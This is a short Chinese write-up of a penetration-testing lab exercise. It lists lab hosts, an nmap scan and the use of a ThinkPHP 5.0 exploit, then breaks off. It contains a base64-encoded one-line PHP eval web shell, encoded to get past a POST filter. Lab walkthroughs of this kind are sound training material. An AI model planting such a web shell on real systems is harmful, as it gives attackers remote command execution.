0x00 前言
最近开始学内网渗透,复现teamssix的三层内网靶场
0x01环境
攻击机kali ip: 192.168.159.135
Target1 CentOS ip: 192.168.159.144 ip2: 192.168.22.128
Target2 Ubntu ip:192.168.22.129 ip2:192.168.33.128
Target3 Windows7 ip:192.168.33.33
0x02复现
首先对target1进行一个nmap的扫描
nmap -Pn -sT 192.168.159.144
目标打开了 80 8888 3306 等端口,一般来说先从web找突破口,访问目标80端口
目标使用了ThinkPhp 5.0,这个版本是有漏洞的 ,exp打一波
访问shell.php却报错了,原来是POST被过滤。 使用base64编码传输过去
echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4="